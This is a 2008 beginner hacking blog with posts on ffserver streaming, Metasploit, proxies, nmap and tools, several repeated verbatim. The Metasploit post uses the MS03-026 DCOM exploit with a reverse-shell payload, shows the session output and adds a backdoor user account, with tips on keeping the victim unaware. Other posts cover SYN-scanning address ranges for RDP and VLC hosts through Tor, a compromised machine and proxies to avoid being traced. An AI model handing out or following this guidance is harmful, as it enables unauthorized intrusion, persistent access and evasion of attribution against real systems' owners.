Well here is what I'm doing this Friday night all day I was playing around with network streaming video, I have been playing around with ffserver and VLC streaming. I got VLC working great except slow upload speeds for ffserver hasn't been working so great when ever I try to host a file this happens.
#ffmpeg -i /tmp/output.flv http://localhost:8090/output.flv
Seems stream 0 codec frame rate differs from container frame rate: 23.98 (65535/2733) -> 23.98 (10000000/417083)
Input #0, avi, from '/tmp/test.avi':
Duration: 00:21:49.8, start: 0.000000, bitrate: 1088 kb/s
Stream #0.0: Video: mpeg4, yuv420p, 640x480, 23.98 fps(r)
Stream #0.1: Audio: mp3, 48000 Hz, stereo, 128 kb/s
Output #0, flv, to 'http://localhost:8090/test.flv':
Stream #0.0: Video: flv, yuv420p, 640x480, q=2-31, 200 kb/s, 23.98 fps(c)
Stream #0.1: Audio: libmp3lame, 22050 Hz, stereo, 64 kb/s
Stream mapping:
Stream #0.0 -> #0.0
Stream #0.1 -> #0.1
Press [q] to stop encoding
Broken pipe
I played with it for serveral hours today but still havn't gotten it to work, I'll prob put a couple more hours in tomorrow to get it to work, but it's friday night it's hack time. (lol) So VLC uses the default port of 1234 and ffserver uses 8090. I've mapped about 2,000 ports so far and only found 3 comps listening on 1234 and only one of them is VLC but its encrypted so have to go back to looking. To let you know how NMap I use a prehacked computer run tor network and run NMap, I'll get a guide up on how to install tor soon enough. I registers that I'm in germany and if you constantly check back like every 10 min it will say you are some where else. I'll post my results up this weekend. This should be a good reason for people not to use default ports, always use off ports for personal use.
Friday, May 16, 2008
Tuesday, May 13, 2008
MetaSploit
A good way to learn how to start hacking is setting up a practice box. I usually just setup a fresh install of XP with no update. This makes life easy it's like progressing, you start with an open box try to hack it, patch it try to hack it again, secure it try to hack it again etc.. so you learn how to grow from the bottom up. Believe it, it is 2008 and there are still some people who do not run sp2 which will shield you from my following example. Metasploit is great program for n00b's you can see the Framework so you know how it works and you can monitor your network or the hack box for you can see exactly what it is doing. For this example I'll be using metasploit web interface which I never used a couple years ago. So you launch the interface and browse over to http://127.0.0.1:55555 for this example I will be using the Exploit Microsoft FPC DCOM MS03-026 once you select it you will be prompted with payloads I always choose win32_reverse which will give you a command prompt to that computer. My advice would not to use VNC since it will look the user out of there computer and they will notice somehting is up. I like to make my own user account so If I'm ever actually at the computer I have a username and password. So when you deliver the payload you will get this.
[*] Starting Reverse Handler.
[*] Sending request...
[*] Got connection from 10.10.10.197:4321 <-> 10.10.10.134:2255
[*] Shell started on session 1
When you click on session 1 you will get the shell.
We are going to add a user named metasploit.
C:\WINDOWS\system32>
>> net user metasploit /add
net user metasploit /add
The command completed successfully.
C:\WINDOWS\system32>
You can choose to change the users password, change admin password etc.. have fun with it.
[*] Starting Reverse Handler.
[*] Sending request...
[*] Got connection from 10.10.10.197:4321 <-> 10.10.10.134:2255
[*] Shell started on session 1
When you click on session 1 you will get the shell.
We are going to add a user named metasploit.
C:\WINDOWS\system32>
>> net user metasploit /add
net user metasploit /add
The command completed successfully.
C:\WINDOWS\system32>
You can choose to change the users password, change admin password etc.. have fun with it.
Wednesday, May 7, 2008
Proxy
To start off you are going to want to use proxys. It is a good habit to get into in case you are just browsing the web and come across bad source code later on and want to exploit it. Its relativley simple. You can just google anonymous proxy and get a list of proxy servers. You might have to try around 10 of them to find one that is working and isn't uber slow. To setup a proxy on Firefox in linux you go to
Edit
Options
Advanced
Connection-Settings
Manual proxy configuration
Then you would just fill it in according to the information you found on the proxy list. To test you just browse to whatismyip.com and if it says your Ip is that of the Proxy server then you are ready to go!
Edit
Options
Advanced
Connection-Settings
Manual proxy configuration
Then you would just fill it in according to the information you found on the proxy list. To test you just browse to whatismyip.com and if it says your Ip is that of the Proxy server then you are ready to go!
Tuesday, May 6, 2008
NMap
Nmap is a great tool, first you install nmap I'm a FreeBSD guy so to install all I do is.
#cd /usr/ports/security/nmap
#make install clean
Now nmap is installed there are many type of scans you can do. I choose to do syn scans. A syn scan is pretty much like playing ding dong ditch. You Initiate a 3way handshake and you wait for the response and leave you never return the third handshake. To do a syn scan you use the switch -sS. Another good switch you will want to add is -P0(zero) this will make nmap run even if it doesn't get a respond from the ping. This is good because allot of firewalls block icmp requests. The most important switch is the port switch -p"port#". You can either tell nmap to look at a port or a range of ports, I usually choose port 3389 mstsc port, You will find out what OS its running, XP Vista Server 2k of server 03 just by logging on. so the command will look something like this to scan 3389 with all the switches I talked about.
#nmap -p3389 -P0 -sS
The next thing you have to include in the command is the IP address. You can either scan an IP or a range of IP. I usually scan a range on Thursday night for by the time its Friday night I'll have something to do. To scan the IP 192.168.1.107 you would do this.
#nmap -p3389 -P0 -sS 192.168.2.107
To scan 192.168.2.0-255 you would use the /24 for all of you who don't know what the 24 is it means 255.255.255.0 which equates to 24 1's 11111111.11111111.11111111.00000000 so the command will look something like
#nmap -p3389 -P0 -sS 192.168.2.0/24
The results of the Scan will look something like this.
PORT STATE SERVICE
3389/tcp filtered ms-term-serv
If the program isn't listening on 3389 and you have a firewall it will say filtered. If nothing is listening on the port and you don't have a firewall it will say closed and if something is listening on that port it will say open.
#cd /usr/ports/security/nmap
#make install clean
Now nmap is installed there are many type of scans you can do. I choose to do syn scans. A syn scan is pretty much like playing ding dong ditch. You Initiate a 3way handshake and you wait for the response and leave you never return the third handshake. To do a syn scan you use the switch -sS. Another good switch you will want to add is -P0(zero) this will make nmap run even if it doesn't get a respond from the ping. This is good because allot of firewalls block icmp requests. The most important switch is the port switch -p"port#". You can either tell nmap to look at a port or a range of ports, I usually choose port 3389 mstsc port, You will find out what OS its running, XP Vista Server 2k of server 03 just by logging on. so the command will look something like this to scan 3389 with all the switches I talked about.
#nmap -p3389 -P0 -sS
The next thing you have to include in the command is the IP address. You can either scan an IP or a range of IP. I usually scan a range on Thursday night for by the time its Friday night I'll have something to do. To scan the IP 192.168.1.107 you would do this.
#nmap -p3389 -P0 -sS 192.168.2.107
To scan 192.168.2.0-255 you would use the /24 for all of you who don't know what the 24 is it means 255.255.255.0 which equates to 24 1's 11111111.11111111.11111111.00000000 so the command will look something like
#nmap -p3389 -P0 -sS 192.168.2.0/24
The results of the Scan will look something like this.
PORT STATE SERVICE
3389/tcp filtered ms-term-serv
If the program isn't listening on 3389 and you have a firewall it will say filtered. If nothing is listening on the port and you don't have a firewall it will say closed and if something is listening on that port it will say open.
Programs
Lets get this straight 90% real hackers do not use pre made programs. What alot of hackers due is browse the web and look at source code for bad code or an opening. But I'm going to go with that most you don't know html, php etc... enough to spot these flaws. There are plenty of great tools out there for beginners to use such as.
Nmap
metasploit
tsgrinder
Security is a big thing for a hacker to practice, you don't want your scans coming back to you like a company calling you isp and saying this guy is port scanning me. So it is a good idea to always use a proxy or a proxy chain. Its pretty easy to find out who's port scanning you. I opened a log off my firewall and got this IP of someone who portscaned 5 of my ports 216.77.188.54 then I just go to Arin plug in the IP and bam I have an ISP Bell south and a location in the country Atlanta GA.
If you nmap a company with a static IP you probably will never get a call, unless they have an anal tech guy. It would take me about a week to go through a day of port scan logs so its not very worth it in my perspective. But do this without a proxy at your own risk. And make sure the proxy is anonymous and not transparent. LOL
Nmap
metasploit
tsgrinder
Security is a big thing for a hacker to practice, you don't want your scans coming back to you like a company calling you isp and saying this guy is port scanning me. So it is a good idea to always use a proxy or a proxy chain. Its pretty easy to find out who's port scanning you. I opened a log off my firewall and got this IP of someone who portscaned 5 of my ports 216.77.188.54 then I just go to Arin plug in the IP and bam I have an ISP Bell south and a location in the country Atlanta GA.
If you nmap a company with a static IP you probably will never get a call, unless they have an anal tech guy. It would take me about a week to go through a day of port scan logs so its not very worth it in my perspective. But do this without a proxy at your own risk. And make sure the proxy is anonymous and not transparent. LOL
Welcome
So I'm going to introduce some of you into the world of hacking. Over the next couple months I'm going to teach you how to come from being a complete n00b to script kiddy to some one who knows there stuff. Theres many different types of hackers I'm not going to get into the hacker vs cracker speech because the are both good skills to have. I find hardware hacking more fun the software, probably because I'm good at hardware hacking, but I've been teaching myself computer hacking for a couple years now and I'll show you what I have learned. Not all hacking is bad it comes in very handy when you are a Network Administrator. Well Hope you guys enjoy
Subscribe to:
Posts (Atom)